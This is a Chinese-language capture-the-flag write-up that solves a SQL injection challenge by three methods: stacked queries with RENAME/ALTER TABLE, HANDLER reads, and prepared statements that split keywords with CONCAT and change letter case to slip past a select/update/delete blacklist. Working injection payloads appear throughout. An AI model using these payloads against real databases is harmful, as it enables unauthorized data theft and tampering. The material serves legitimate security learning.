方法一（堆叠注入+rename&alter）

就是可以堆一堆sql注入进行注入，这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单，就是将原来的语句构造完后加上分号，代表该语句结束，后面在输入的就是一个全新的sql语句了，这个时候我们使用增删查改毫无限制。
相关知识补充：
https://www.jianshu.com/p/c50ced83414d
https://blog.csdn.net/SouthWind0/article/details/82929895

先添加一个单引号，报错，错误信息如下：

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

接着测试–+注释，发现可以过滤，然后使用#注释，可行 用order by语句判断出有两个字段，接着使用union select 爆字段，发现这个时候出现了如下提示：
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现上面的关键字都被过滤不能使用了，没法进行注入，这个时候尝试一下堆叠注入

现在回到这道题，利用堆叠注入，查询所有数据库：
1';show databases;#

这里如果把1改成-1就可以只显示下面的内容了
查询所有表:
1';show tables;#

查询words表中所有列:

1';show columns from words;#

查询1919810931114514表中所有列

1';show columns from `1919810931114514`;#      (数字为表名操作时要加反引号)

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表，因为查询出的结果是一个数字加一个字符串，words表结构是id和data，传入的inject参数也就是赋值给了id

这道题没有禁用rename和alert，所以我们可以采用修改表结构的方法来得到flag 将words表名改为words1，再将数字名表改为words，这样数字名表就是默认查询的表了，但是它少了一个id列，可以将flag字段改为id，或者添加id字段

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

这里用到了：
更改列名：
ALTER TABLE 表名 CHANGE COLUMN 列名 新列名 属性
更改表名：
ALTER TABLE 表名 RENAME TO 表新名

alter用法

这段代码的意思是将words表名改为words1，1919810931114514表名改为words，将现在的words表中的flag列名改为id 然后用1’ or 1=1 #得到flag

方法二（handler）

如果禁掉rename和alter，还可以用这个payload

`1';handler `19xxx` open;handler `19xxx` read first;handler `19xxx` close;`

在知道表，部分关键字被禁止的情况下，用handler直接读取表内容。

语法：
https://www.cnblogs.com/taoyaostudy/p/13479367.html

方法三（预编译）

利用此方法的前提是支持多语句查询。
MySQL的预编译语法为：

//定义预编译语句
PREPARE stmt_name FROM preparable_stmt;
//执行预编译语句
EXECUTE stmt_name [USING @var_name [, @var_name] …];

解释一下，定义的时候，preparable_stmt代表的是预留数据位置的SQL语句，而stmt_name是类似变量名，代表这个SQL语句，下面举个例子：

PREPARE test FROM ‘SELECT (? + ?)’;
//即定义了一个两数相加的SQL预编译语句

执行时，@var_name即变量，可以带入语句中进行执行，如：

SET @a = 1;
SET @b = 2; //给变量赋值

EXECUTE test USING @a,@b;//执行

这道题目主要就是利用此方法来绕过黑名单，其具体方法也不止一种，可以利用concat()将关键词分开处理，也可以将整个语句使用char()处理后执行。
相关内容补充：https://www.bilibili.com/read/cv5071554/

那么用在这道题就是

-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下：

-1’;

set @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’);

prepare stmt from @sql;

EXECUTE stmt; #

这里用strstr函数过滤了set和prepare关键词，但strstr这个函数并不能区分大小写，我们将其大写即可。

-1';sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#

得到flag